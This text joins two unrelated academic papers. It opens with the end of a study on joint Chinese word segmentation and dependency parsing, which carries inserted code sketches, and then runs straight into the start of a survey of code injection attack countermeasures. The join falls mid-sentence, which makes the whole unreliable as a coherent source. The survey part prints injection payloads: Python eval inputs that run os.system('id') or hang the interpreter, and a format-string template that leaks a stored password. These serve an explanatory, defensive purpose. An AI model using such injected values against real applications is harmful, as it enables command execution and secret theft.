joint model with the pipeline model. the pipeline model first uses our best joint-segonly model to obtain segmenta- tion results, then applies the word-based biaffine parser to parse the segmented sentence. the word- level biaffine parser is the same as in dozat and manning ( ) but without pos tags. 
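for readers unfamiliar with the biaffine parser used by the pipeline, the scoring form can be sketched in a few lines of numpy; this is only the arc-scoring step under simplified assumptions (toy dimensions, no separate MLP heads, no explicit root token), not the paper's configuration.

import numpy as np

def biaffine_arc_scores(h_dep, h_head, U, b):
    """Score every (dependent i, head j) pair with a biaffine form:
    s[i, j] = h_dep[i] @ U @ h_head[j] + h_head[j] @ b.
    h_dep, h_head : (n, d) representations of dependents and heads
    U             : (d, d) bilinear weight
    b             : (d,)   head-prior bias."""
    bilinear = h_dep @ U @ h_head.T           # (n, n) pairwise scores
    head_bias = (h_head @ b)[None, :]         # broadcast over dependents
    return bilinear + head_bias

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    n, d = 5, 8                               # toy sizes only
    scores = biaffine_arc_scores(rng.normal(size=(n, d)), rng.normal(size=(n, d)),
                                 rng.normal(size=(d, d)), rng.normal(size=(d,)))
    print(scores.shape)                       # (5, 5)
    print(scores.argmax(axis=1))              # greedy head choice per dependent

in the joint models the same form is applied over character representations rather than word representations, which is what allows segmentation and parsing to share one decoder.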
just like the joint parsing metric, for a dependent-head word pair, only when both head and dependent words are correct can this pair be viewed as a right one. table obviously shows that in ctb- , ctb- , and ctb- , the joint-multi model consistently outperforms the pipeline model in f udep, uas, f ldep, and las. although the f seg difference between the joint-multi model and the pipeline model is only − . , + . , + . in ctb- , ctb- , and ctb- , respectively, the f udep of the joint-multi is higher than the pipeline model by + . , + . , and + . , respectively; we believe this indicates the better resistance to error propagation of the joint-multi model. additionally, when bert is used, f udep, uas, f ldep, and las are substantially im- proved, which represents that our joint model can take advantage of the power of bert. in ctb- , the joint model even achieves better uas than the gold-segmented word-based model. and for the las, joint-multi-bert models also achieve better results in ctb- and ctb- . we presume the reason that performance of cws does not improve as much as dependency parsing is that the falsely segmented words in joint-multi-bert are mainly segmenting a long word into several short words or recognizing several short words as one long word. . ablation study as our model uses various n-gram pre-trained em- beddings, we explore the influence of these pre- trained embeddings. the second row in table shows the results of the joint-multi model without pre-trained embeddings; it is clear that pre-trained downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- pudep seg-wrong head-wrong pudep seg-wrong head-wrong pudep seg-wrong head-wrong pipeline . % . % . % . % . % . % . % . % . % joint-multi . % . % . % . % . % . % . % . % . % joint-multi-bert . % . % . % . % . % . % . % . % . % the value of pudep is the percentage that the predicted arc is correct. ‘seg-wrong’ means that either head or dependent (or both) is wrongly segmented. ‘head-wrong’ means that the word is correctly segmented but the predicted head word is wrong. table : error analysis of unlabeled dependency parsing in the test set of different datasets. embeddings are important for both the word seg- mentation and dependency parsing. we also tried to remove the bigram and tri- gram. results are illustrated in the third row of table . compared with the joint-multi model, without bigram and trigram, it performs worse in all metrics. however, the comparison between the second row and the third row shows diver- gence in cws and dependency parsing for datasets ctb- and ctb- . for cws, the model without pre-trained embeddings obtains superior perfor- mance than without the bigram and trigram fea- ture, whereas for all dependency parsing related metrics, the model with pre-trained character em- bedding obtains better performance. we assume the n-gram features are important to chinese word segmentation. for the dependency parsing task, however, the relation between two characters are more beneficial; when pre-trained embeddings are combined, the model can exploit the relationship encoded in the pre-trained embeddings. addition- ally, for ctb- and ctb- , even though the third row has inferior f seg (on average . % lower than the second row), it still achieves much better f udep (on average . % higher than the second row). we believe this is a proof that joint cws and dependency parsing is resistant to error prop- agation. 
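the f seg values discussed throughout this section are span-based; the small sketch below shows one way to compute them from a gold and a predicted segmentation (this is a generic implementation of the standard metric, not the paper's evaluation script).

def spans(words):
    """Convert a segmentation into a set of (start, end) character spans."""
    out, start = set(), 0
    for w in words:
        out.add((start, start + len(w)))
        start += len(w)
    return out

def seg_prf(gold_words, pred_words):
    """Span-based precision, recall, and F1 for word segmentation."""
    gold, pred = spans(gold_words), spans(pred_words)
    correct = len(gold & pred)
    p = correct / len(pred) if pred else 0.0
    r = correct / len(gold) if gold else 0.0
    f = 2 * p * r / (p + r) if p + r else 0.0
    return p, r, f

if __name__ == "__main__":
    gold = ["他", "喜欢", "音乐"]
    pred = ["他", "喜", "欢", "音乐"]
    print(seg_prf(gold, pred))   # (0.5, 0.666..., 0.571...)

the dependency metrics are computed analogously over (head word, dependent word) pairs, which is why a wrongly segmented word necessarily costs both f seg and f udep.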
the higher segmentation and dependency parsing performance for the model without pre- trained embedding in ctb- might be owing to its large training set, which can achieve better results even from randomly initialized embeddings. . error analysis apart from performing the standard evaluation, we investigate where the dependency parsing head prediction error comes from. the errors can be divided into two kinds, ( ) either the head or dependent (or both) is wrongly segmented, or ( ) there is the wrong choice on the head word. the ratio of these two mistakes is presented in table . for the joint-multi model, more mistakes caused by segmentation in ctb- is coherent with our observation that ctb- bears lower cws per- formance. based on our error analysis, the wrong prediction of head word accounts for most of the errors, therefore further joint models addressing head prediction error problem might result in more gain on performance. additionally, although from table the dis- tinction of f seg between the joint-multi model and the pipeline model is around + . % on aver- age, the difference between the head-wrong is more than around + . % in average. we think this is caused by the pipeline model, in which is more sensitive to word segmentation errors and suffers more from the oov problem, as depicted in figure . from the last row of table , joint- multi-bert achieves excellent performance on dependency parsing because it can significantly reduce errors caused by predicting the wrong head. conclusion and future work in this paper, we propose a graph-based model for joint chinese word segmentation and dependency parsing. different from the previous joint models, our proposed model is a graph-based model and is more concise, which results in fewer efforts of feature engineering. although no explicit hand- crafted parsing features are applied, our joint model outperforms the previous feature-riched joint models by a large margin. the empirical re- sults in ctb- , ctb- , and ctb- show that the dependency parsing task is also beneficial to chinese word segmentation. additionally, labeled dependency parsing not only is good for chinese word segmentation, but also avails the dependency parsing head prediction. apart from good performance, the comparison between our joint model and the pipeline model downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : parsing results of different models. the red dashed box means the dependency label is wrong. the red dashed edge means this dependency arc does not exist. although the pipeline model has the right word segmentation, ‘‘ ’’ is an out-of-vocabulary word. therefore, it fails to find the right dependency relation and adversely affects predictions afterward. the joint-multi model can still have a satisfying outcome even with wrong segmentation, which depicts that the joint-multi model is resistant to wrong word segmentations. the joint-multi-bert correctly finds the word segmentation and dependency parsing. shows great potentialities for character-based chinese dependency parsing. and owing to the joint decoding between chinese word segmen- tation and dependency parsing, our model can use a pre-trained character-level language model (such as bert) to enhance the performance further. after the incorporation of bert, the perfor- mance of our joint model increases substantially, resulting in the character-based dependency pars- ing performing near the gold-segmented word- based dependency parsing. 
our proposed method not merely outpaces the pipeline model, but also avoids the preparation for pre-trained word embeddings that depends on a good chinese word segmentation model. in order to fully explore the possibility of graph- based chinese dependency parsing, future work should be done to incorporate pos tagging into this framework. additionally, as illustrated in zhang et al. ( ), a more reasonable intra-word dependent structure might further boost the perfor- mance of all tasks. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april acknowledgments we would like to thank the action editor and the anonymous reviewers for their insightful com- ments. we also thank the developers of fastnlp, yunfan shao and yining zheng, for developing this handy natural language processing package. this work was supported by the national key research and development program of china (no. yfc ), national natural science foundation of china (no. ), shanghai municipal science and technology major project (no. shzdzx ), and zjlab. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in rd international conference on learning repre- sentations, iclr , san diego, ca, usa, may – , , conference track proceedings. xinchi chen, xipeng qiu, and xuanjing huang. . a feature-enriched neural model for joint chinese word segmentation and part-of-speech tagging. in proceedings of the twenty-sixth international joint conference on artificial intelligence, ijcai , melbourne, australia, august – , . xinchi chen, xipeng qiu, chenxi zhu, pengfei liu, and xuanjing huang. . long short- term memory neural networks for chinese word segmentation. in proceedings of the conference on empirical methods in natural language processing, emnlp , lisbon, portugal, september – , . yiming cui, wanxiang che, ting liu, bing qin, ziqing yang, shijin wang, and guoping hu. . pre-training with whole word masking for chinese bert. corr, abs/ . v . jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt https://github.com/fastnlp/fastnlp. , minneapolis, mn, usa, june – , , volume (long and short papers). timothy dozat and christopher d. manning. . deep biaffine attention for neural depen- dency parsing. in th international conference on learning representations, iclr , toulon, france, april – , , conference track proceedings. xavier glorot and yoshua bengio. . under- standing the difficulty of training deep feed- forward neural networks. in proceedings of the thirteenth international conference on arti- ficial intelligence and statistics, aistats , chia laguna resort, sardinia, italy, may – , . jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in the th annual meeting of the association for computational linguistics, proceedings of the conference, july – , , jeju island, korea - volume : long papers. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. 
in rd international conference on learning repre- sentations, iclr , san diego, ca, usa, may – , , conference track proceedings. eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing us- ing bidirectional lstm feature representations. transactions of the association for computa- tional linguistics tacl, : – . sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. shuhei kurita, daisuke kawahara, and sadao kurohashi. . neural joint model for transition-based chinese syntactic analysis. in proceedings of the th annual meeting of the association for computational linguistics, acl , vancouver, canada, july - august , volume : long papers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/fastnlp/fastnlp john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional ran- dom fields: probabilistic models for segment- ing and labeling sequence data. in proceedings of the eighteenth international conference on machine learning (icml ), williams col- lege, williamstown, ma, usa, june - july , . haonan li, zhisong zhang, yuqi ju, and hai zhao. . neural character-level dependency parsing for chinese. in proceedings of the thirty- second aaai conference on artificial intelli- gence, (aaai- ), the th innovative applications of artificial intelligence (iaai- ), and the th aaai symposium on educational advances in artificial intelligence (eaai- ), new orleans, louisiana, usa, february – , . zhenghua li, min zhang, wanxiang che, ting liu, wenliang chen, and haizhou li. . joint models for chinese pos tagging and dependency parsing. in proceedings of the conference on empirical methods in natural language processing, emnlp , – july , john mcintyre conference centre, edinburgh, uk, a meeting of sigdat, a spe- cial interest group of the acl. wang ling, chris dyer, alan w. black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in naacl hlt , the conference of the north american chapter of the association for com- putational linguistics: human language technologies, denver, colorado, usa, may - june , . ilya loshchilov and frank hutter. . de- coupled weight decay regularization. in th international conference on learning repre- sentations, iclr , new orleans, la, usa, may – , . ji ma, kuzman ganchev, and david weiss. . state-of-the-art chinese word segmentation with bi-lstms. in proceedings of the confer- ence on empirical methods in natural language processing, brussels, belgium, october - november , . hwee tou ng and jin kiat low. . chinese part-of-speech tagging: one-at-a-time or all- at-once? word-based or character-based? in proceedings of the conference on em- pirical methods in natural language pro- cessing, emnlp , a meeting of sigdat, a special interest group of the acl, held in conjunction with acl , – july , barcelona, spain. wenzhe pei, tao ge, and baobao chang. . max-margin tensor neural network for chinese word segmentation. in proceedings of the nd annual meeting of the association for com- putational linguistics, acl , june – , , baltimore, md, usa, volume : long papers. xian qian and yang liu. . joint chinese word segmentation, pos tagging and parsing. in proceedings of the joint conference on empirical methods in natural language processing and computational natural lan- guage learning, emnlp-conll , july – , , jeju island, korea. 
xipeng qiu, jiayi zhao, and xuanjing huang. . joint chinese word segmentation and pos tagging on heterogeneous annotated cor- pora with multiple task learning. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , grand hyatt seattle, seattle, washington, usa, a meeting of sigdat, a special interest group of the acl. yan shao, christian hardmeier, jörg tiedemann, and joakim nivre. . character-based joint segmentation and pos tagging for chinese using bidirectional rnn-crf. in proceedings of the eighth international joint conference on natural language processing, ijcnlp , taipei, taiwan, november - december , - volume : long papers. tianze shi, liang huang, and lillian lee. . fast(er) exact decoding and global training for transition-based dependency parsing via a minimal feature set. in proceedings of the conference on empirical methods in natural language processing, emnlp , copenhagen, denmark, september – , . yan song, shuming shi, jing li, and haisong zhang. . directional skip-gram: explic- itly distinguishing left and right context for word embeddings. in proceedings of the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt, new orleans, louisiana, usa, june – , , volume (short papers). chi sun, luyao huang, and xipeng qiu. . utilizing bert for aspect-based sentiment analysis via constructing auxiliary sentence. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, naacl-hlt , minneapolis, mn, usa, june – , , volume (long and short papers). yiou wang, jun’ichi kazama, yoshimasa tsuruoka, wenliang chen, yujie zhang, and kentaro torisawa. . improving chinese word seg- mentation and pos tagging with semi-supervised methods using large auto-analyzed data. in fifth international joint conference on natural language processing, ijcnlp , chiang mai, thailand, november – , . zhiguo wang, chengqing zong, and nianwen xue. . a lattice-based framework for joint chinese word segmentation, pos tagging and parsing. in proceedings of the st annual meeting of the association for computational linguistics, acl , – august , sofia, bulgaria, volume : short papers. naiwen xue, fei xia, fu-dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engineering, ( ): – . liner yang, meishan zhang, yang liu, maosong sun, nan yu, and guohong fu. . joint pos tagging and dependence parsing with transition-based neural networks. ieee/acm trans. audio, speech & language processing, ( ): – . meishan zhang, nan yu, and guohong fu. . a simple and effective neural model for joint word segmentation and pos tagging. ieee/acm trans. audio, speech & language processing, ( ). meishan zhang, yue zhang, wanxiang che, and ting liu. . character-level chinese depen- dency parsing. in proceedings of the nd annual meeting of the association for com- putational linguistics, acl , june – , , baltimore, md, usa, volume : long papers. yue zhang and stephen clark. . joint word segmentation and pos tagging using a single perceptron. in acl , proceedings of the th annual meeting of the association for computational linguistics, june – , , columbus, ohio, usa. yue zhang and stephen clark. . 
a fast decoder for joint word segmentation and pos- tagging using a single discriminative model. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , mit stata center, massachusetts, usa, a meeting of sigdat, a special interest group of the acl. yuan zhang, chengtao li, regina barzilay, and kareem darwish. . randomized greedy inference for joint segmentation, pos tagging and dependency parsing. in naacl hlt , the conference of the north american chapter of the association for computational linguistics: human language technologies, denver, colorado, usa, may - june , . xiaoqing zheng, hanyang chen, and tianyu xu. . deep learning for chinese word seg- mentation and pos tagging. in proceedings of the conference on empirical methods in natural language processing, emnlp , – october , grand hyatt seattle, seattle, washington, usa, a meeting of sigdat, a special interest group of the acl. ming zhong, pengfei liu, danqing wang, xipeng qiu, and xuanjing huang. . searching for effective neural extractive summarization: what works and what’s next. in proceedings of the th conference of the association for com- putational linguistics, acl , florence, italy, july - august , , volume : long papers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction related work joint segmentation and pos tagging joint pos tagging and dependency parsing joint segmentation, pos tagging, and dependency parsing proposed model encoding layer bilstm-based encoding layer bert-based encoding layer biaffine layer unlabeled arc prediction arc label prediction models for word segmentation only experiments datasets measures experimental settings proposed models comparison with the previous joint models chinese word segmentation comparison with the pipeline model ablation study error analysis conclusion and future work submitted january accepted october published november corresponding author dimitris mitropoulos, dimitro@aueb.gr academic editor cynthia irvine additional information and declarations can be found on page doi . /peerj-cs. copyright mitropoulos and spinellis distributed under creative commons cc-by . open access fatal injection: a survey of modern code injection attack countermeasures dimitris mitropoulos and diomidis spinellis department of management science and technology, athens university of economics and business, greece abstract with a code injection attack (cia) an attacker can introduce malicious code into a computer program or system that fails to properly encode data that comes from an untrusted source. a cia can have different forms depending on the execution context of the application and the location of the programming flaw that leads to the attack. currently, cias are considered one of the most damaging classes of application attacks since they can severely affect an organisation’s infrastructure and cause financial and reputational damage to it. in this paper we examine and categorize the countermeasures developed to detect the various attack forms. in particular, we identify two distinct categories. the first incorporates static program analysis tools used to eliminate flaws that can lead to such attacks during the development of the system. the second involves the use of dynamic detection safeguards that prevent code injection attacks while the system is in production mode. 
our analysis is based on nonfunctional characteristics that are considered critical when creating security mechanisms. such characteristics involve usability, overhead, implementation dependencies, false positives and false negatives. our categorization and analysis can help both researchers and practitioners either to develop novel approaches, or use the appropriate mechanisms according to their needs. subjects security and privacy keywords application security, code injection attacks, countermeasures, static analysis, dynamic prevention, software vulnerabilities, cross-site scripting introduction and covered area security vulnerabilities derive from a small number of programming flaws that lead to security breaches (wurster & van oorschot, ; viega & mcgraw, ). one common mistake that developers make concerns user input, assuming, for example, that only word characters will be entered by the user, or that the user input will never exceed a certain length (mitropoulos et al., ). developers may assume, correctly, that a high-level language in an application will protect them against threats like buffer overflows (keromytis, ). developers may also assume, incorrectly, that user input is not a security issue any more. such an assumpion can lead to the processing of invalid data that an attacker can introduce into a program and cause it to execute malicious code. this kind of exploit is known as a code injection attack (cia) (ray & ligatti, ; mitropoulos et al., ). code injection attacks have been topping the vulnerability lists of numerous bulletin providers for several years. (http://www.sans.org/top-cyber-security-risks/, http://cwe.mitre.org/top /) consider the open web application security project how to cite this article mitropoulos and spinellis ( ), fatal injection: a survey of modern code injection attack countermeasures. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:dimitro@aueb.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://www.sans.org/top-cyber-security-risks/ http://cwe.mitre.org/top / http://dx.doi.org/ . /peerj-cs. (https://www.owasp.org/index.php/category:owasp_top_ten_project) (owasp) top ten project which represents a broad consensus about what the most critical web application security flaws are, and is referenced by payment card industry security standards council (https://www.pcisecuritystandards.org/security_standards/) (pci dss), defense information systems agency (www.disa.mil/) (disa) and numerous researchers. in its three consecutive top ten lists ( , , ), different classes of code injection are included in the top five positions. over several years of efforts, a large body of knowledge has been assembled regarding code injection attacks consisting of countermeasures, novel ways of attacking, and others. in this paper we first identify the basic categories of cias (‘code injection attacks’). then, we analyze the basic approaches used to counter such attacks, and the mechanisms that implement them (‘countermeasures’). specifically, there are two categories of countermeasures that can be used by developers to: (a) identify and eliminate the vulnerabilities that the system contains during the development process, (b) guard the system against code injection attacks while it is in production mode. 
then, we highlight the positive and negative aspects of each countermeasure and finally we evaluate them based on the following requirements (see 'analysis and discussion'): • flexibility: we check whether an approach can be adjusted in order to detect different code injection attack categories. • effectiveness tests: since we examine security mechanisms that detect either attacks or defects, we want to see whether researchers have measured the effectiveness of their proposed mechanisms in terms of false positive and false negative rates. • implementation independence: we check whether the mechanisms depend either on the characteristics of the programming language that was used to develop them or on the implementation details of the protecting entity. • computational overhead: finally, we examine whether a mechanism imposes a cost due to its use, as it may introduce an amount of extra computation on an application. all the aforementioned requirements are considered critical when building security mechanisms (anderson, ; romero-mariona et al., ; mellado, fernández-medina & piattini, ; halfond, viegas & orso, ). finally, we discuss some emerging challenges for future research in the field ('emerging challenges'), and provide some general observations together with some concluding remarks ('conclusions'). there is already a survey on mitigating software vulnerabilities in general (shahriar & zulkernine, ); the scope of that research is very broad and it leaves out many approaches and mechanisms that we report here. also, countermeasures that prevent two subcategories, namely binary code injection (younan, joosen & piessens, ) and sql injection (halfond, viegas & orso, ) in particular, have already been surveyed; the body of work in the field, however, exceeds the boundaries of those surveys too. furthermore, in the latter case (halfond, viegas & orso, ), the survey is quite old, and since then the number of countermeasures that detect sql injection attacks alone has doubled. finally, the authors of that survey do not take false positives and false negatives into account in their research. code injection attacks code injection is a technique to introduce malicious code into a computer program by taking advantage of unchecked or wrong assumptions the program makes about its inputs (mitropoulos et al., ). bratus et al. ( ) portray the issue in a generic fashion: "unexpected (and unexpectedly powerful) computational models inside targeted systems, which turn a part of the target into a so-called 'weird machine' programmable by the attacker via crafted inputs (a.k.a. 'exploits')". as an example of the above definition, the code fragment below defines the operation of addition in the scheme programming language (abelson & sussman, ; dybvig, ):

(define (add x y)
  (+ x y))

consider the case where, instead of a number, a function that leads to an endless loop is passed as an argument by the user. this will cause the interpreter to enter an endless loop and lead to a denial of service. the intuition here is that "every application that copies untrusted input verbatim into an output program is vulnerable to code injection attacks". ray & ligatti ( ) actually proved the above claim based on formal language theory.
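the same pattern, untrusted input copied verbatim into a program that is then executed, can be reproduced in almost any language with an evaluation facility. the sketch below is an analogous illustration in Python rather than scheme; the function names are made up for the example.

def add(x, y):
    return x + y

def run_calculator(user_x: str, user_y: str):
    # The untrusted strings are spliced verbatim into a code fragment.
    return eval(f"add({user_x}, {user_y})")

print(run_calculator("1", "2"))   # 3, as the developer intended
# An attacker-controlled "number" injects arbitrary behaviour instead:
#   run_calculator("1", "__import__('time').sleep(10**6)")   # denial of service
#   run_calculator("1", "__import__('os').system('id')")     # command execution

the injected expressions are evaluated before the intended addition ever happens, which is exactly the behaviour the formal result above captures.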
code injection attacks are one of the most critical classes of attacks (francillon & castelluccia, ; su & wassermann, ; baca, carlsson & lundberg, ) due to the following reasons: • they can occur in different layers, such as databases, libraries, native code and the browser. • they span a wide range of security issues, such as viewing sensitive information, editing of personal data, or even stopping the execution of a system. figure presents a categorization of cias divided into two categories. the first involves binary code and the second source code. we illustrate the attack categories and subcategories that have been analyzed in other research papers in grey color. javascript injection has lately become a prominent subcategory, hence we provide some basic examples in the appendix.

figure: a categorization of code injection attacks. the subcategories that have been extensively analyzed in other research papers (lhee & chapin, ; pincus & baker, ) can be seen in grey colour.

binary code injection attacks: such attacks involve the insertion of binary code into an application to alter its execution flow and execute malicious compiled code. this category involves buffer-overflow attacks (cowan et al., ; keromytis, ; szekeres et al., ), a staple of security problems. these attacks may occur when the bounds of memory areas are not checked, and access beyond these bounds is possible by the program. based on this, malicious users can inject additional data overwriting the existing data of adjacent memory. from there they can take control over a program or crash it. another attack vector involves format string vulnerabilities. the basis of this defect is the unexpected behaviour of functions with variable arguments. typically, a function that handles a number of arguments has to read them from the stack. if we specify a format string that will make printf expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. if attackers have control over the format string, then they could either read from or write to arbitrary memory addresses. c and c++ are two programming languages vulnerable to this kind of attack, since the corresponding implementations lack a protection scheme against overwriting data in any part of the memory (mitropoulos et al., ). there are two research papers that present various techniques that belong to this category. in particular, an extensive survey on binary code injection attacks can be found in reference (lhee & chapin, ). furthermore, specific advances in exploiting such vulnerabilities (i.e., heap smashing, arc injection and others) have been presented in reference (pincus & baker, ). finally, the countermeasures used to detect such defects have already been surveyed (younan, joosen & piessens, ) (many of them are also included in a book: das, kant & zhang, —section . ). nevertheless, we include some of them in this survey because they prompted the development of some sophisticated countermeasures.
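before moving on to source code attacks, it is worth noting that the printf-style format string problem has a loose analog even in memory-safe languages: when an attacker controls a format specification, it is interpreted with more power than the developer expected. the sketch below is only an illustrative analog in Python (the helper, class, and configuration names are hypothetical); it leaks data through attribute traversal rather than corrupting memory.

CONFIG = {"db_password": "hunter2"}      # hypothetical module-level secret

class Order:
    def __init__(self, item):
        self.item = item

def render(template: str, order: Order) -> str:
    # The caller assumes the template only contains fields like "{0.item}".
    return template.format(order)

print(render("thanks for buying {0.item}!", Order("book")))
# A crafted "format string" walks object attributes to reach module globals:
print(render("{0.__init__.__globals__[CONFIG][db_password]}", Order("book")))

the lesson is the same as in the C case: a format specification is a small program, and letting an attacker write it hands over part of the application's execution.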
source code injection attacks: code injection also includes the use of source code, either of a domain specific language (dsl) or a dynamic language. note that binary code injection attacks can only occur when the target system is implemented in languages lacking array bounds checking, like c and c++. contrariwise, source code-driven injection attacks can target applications written in various programming languages with different features and characteristics. code injection attacks that involve dsls are critical, as dsls like sql and xml play an important role in the development of web applications. for instance, many web applications have interfaces through which web users enter input to interact with the application’s data. in this way, they interact with the underlying rdbms (relational database management system). typically, this input can become part of an sql statement and then gets executed on the corresponding rdbms. an attack that exploits the defects of these interfaces by taking advantage of input validation issues (e.g., inefficient type handling), is called an ‘‘sql injection attack’’ (cert, ; mitropoulos & spinellis, ). the various techniques used mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. code injection attack countermeasures static analysis dynamic detection simple pattern matching lexical analysis data-flow analysis model checking type system extensions symbolic execution instruction set randomization policy enforcement whitelisting runtime tainting figure the basic categories of code injection attack countermeasures. full-size doi: . /peerjcs. /fig- to perform such attacks have can be found in reference (halfond, viegas & orso, ). instructive examples can be also found in reference (su & wassermann, ). by using very similar techniques to the ones presented in the aforementioned references, attackers can perform other exploits based on dsls, like xml (mattos, santin & malucelli, ) and xpath (su & wassermann, ; cannings, dwivedi & lackey, ; mitropoulos, karakoidas & spinellis, ). a critical class of code injection attacks involve dynamic languages such as python, perl, javascript, and php (seixas et al., ; egele et al., ; son, mckinley & shmatikov, ). in particular, javascript injection attacks comprise a wide subset of dynamic language-driven attacks. such attacks are manifested when an application accepts and redisplays data of unknown origin without appropriate validation and filtering. based on this vulnerability, a malicious user can manage to inject a script in the javascript engine of a browser and alter its execution flow (erlingsson, livshits & xie, ). javascript injection attacks are considered as a crucial issue in application security because they are associated with major vulnerabilities such as: xss attacks (sivakumar & garg, ) and xcs (cross-channel scripting) attacks (wang, ; bojinov, bursztein & boneh, ). as we mentioned earlier, typical examples of javascript injection attacks can be found on the appendix of this paper—a. countermeasures two different basic methods are used to deal with the code injection problem (see fig. ): • static analysis involves the inspection of either source or binary code to find software bugs that could lead to a code injection attack without actually executing the program. • dynamic detection observes the behavior of a running system in order to detect and prevent a code injection attack. 
in the first case, programmers try to eliminate software vulnerabilities while applications are created (also known as the build-in security (mcgraw, ) concept). the second concept involves the development of methods and tools that secure systems after their mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. deployment. there are numerous approaches that belong to each of these two basic methods and for each approach fig. , provides the corresponding bibliography. static analysis the main concept behind static analysis is to identify security vulnerabilities during the development process. currently, there are many software development processes that include static analysis tools for security as their integral parts (brown & paller, ; gregoire et al., ; fagan, ). from the usage of utilities like grep to complex methods, static analysis has been an evolving approach to detect software vulnerabilities (chess & west, ). initially, the most straightforward approach is the adoption of secure coding practices (howard & leblanc, ; viega & mcgraw, ; mcgraw, ). for example, to prevent an sql injection attack, developers can use specific features provided by the language they use (e.g., java’s preparedstatement object). nevertheless, this does not usually happen, as developers may not be aware of them, or time schedules may be tight, encouraging sloppy practices instead. simple pattern matching during a manual code review it is easy to look for functions associated with code injection defects. using existing tools available in almost every operating system, security auditors can search through a set of files for an arbitrary text pattern. these patterns are commonly specified through a regular expression. accompanied by a well organized list of patterns, the auditor can quickly identify locations at which a program might face security problems. if auditors choose to use utilities like grep and qgrep though, they must check for every vulnerability manually. apart from this, they must have an expert knowledge because there are many different kinds of such defects. furthermore, the analysis these utilities perform is naive. for example there is no distinction between a vulnerable function call, a comment, and an unrelated identifier. hence, a higher prevalence of false positives should be expected (chess & mcgraw, ). finally the output can be disorganized and overwhelming. the distinct disadvantages of pattern scanning and the continuous emergence of new defects were some of the main reasons that led to more sophisticated approaches. lexical analysis lexical analysis is one of the first approaches used for detecting security defects. this is because it is simple and easy to use. lexical analysis is based upon formal language theory and finite state automata (aho et al., ). as a term, it is mostly used to describe the first phase of the compilation process. however, there is no difference between this phase and the method that we describe here (mcgraw, ). the two differ only in the manipulation of their outcome. there are three phases that can be distinguished here, namely: scanning, tokenizing and matching (kantorovitz, ). in the first two phases possible character sequences are recognized, classified and transformed into various tokens. then the resulting sequences are associated with security vulnerabilities. 
specifically, there are lists that contain entries of vulnerable constructs used during the matching phase. after a successful match an mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. alert message warns auditors, describing the vulnerability and providing them with alternative usages. the lexical analysis approach is implemented by security utilities such as boon (wagner et al., ), pscan (johnson, ; heffley & meunier, ; chen & wagner, ), its (viega et al., ; viega et al., ; wilander & kamkar, ), flawfinder (http://www.dwheeler.com/flawfinder/) (wilander & kamkar, ) and rats (http: //www.security-database.com/toolswatch/rats-v - -rough-auditing-tool-for.html) (kong et al., ; chess & mcgraw, ; wilander & kamkar, ). for the most part, these tools scan source code pointing out unsafe calls of string-handling functions that could lead to a cia. then, they provide a list of possible threats ranked by risk level. this level is usually specified by checking the arguments of such functions. the vulnerability lists are simply constructed making the addition, removal, and modification of an entry quite easy. all the aforementioned tools scan c and c++. this exclusiveness lies on the fact that c and its standard libraries are very susceptible to binary code injection attacks as we mentioned in ‘code injection attacks’. lexical analysis can be flexible, straightforward and extremely fast. with one or more non-processed files as input, and simple descriptions as output, developers can quickly check their code for vulnerabilities. also they can easily update and edit their vulnerability library with new possible threats due to its simplistic nature. although superior to manual pattern matching, this approach has no knowledge of the code’s semantics or how data circulates throughout a program. as a result there are several false positive and negative reports (chess & west, ; cowan, ). note though, that lexical analysis utilities helped the gathering and depiction of a tentative set of security rules in one place for the first time (mcgraw, ). data-flow analysis data-flow analysis is another compiler-associated approach used to discover software defects. it is more sophisticated and more appropriate for a comprehensive code review than lexical analysis. data-flow analysis can be described as a process that gathers details that concern the definition and dependencies of data within a program without executing it (moonen, ; fosdick & osterweil, ). in addition, data-flow analysis algorithms can document all sequences of specific types of events which might occur in a program execution. the key insight of this approach is a control-flow graph (cfg). based on the program’s cfg, this method examines how data moves throughout a program by representing all its possible execution paths (chess & west, ; cahoon & mckinley, ). by traversing the cfg of a program, data-flow analysis can determine where values are generated and where they are used. hence this approach can be used to describe safety properties that are based on the flow of information (abi-antoun, wang & torr, ). as an example: it is very likely that the cfg of a program with an sql 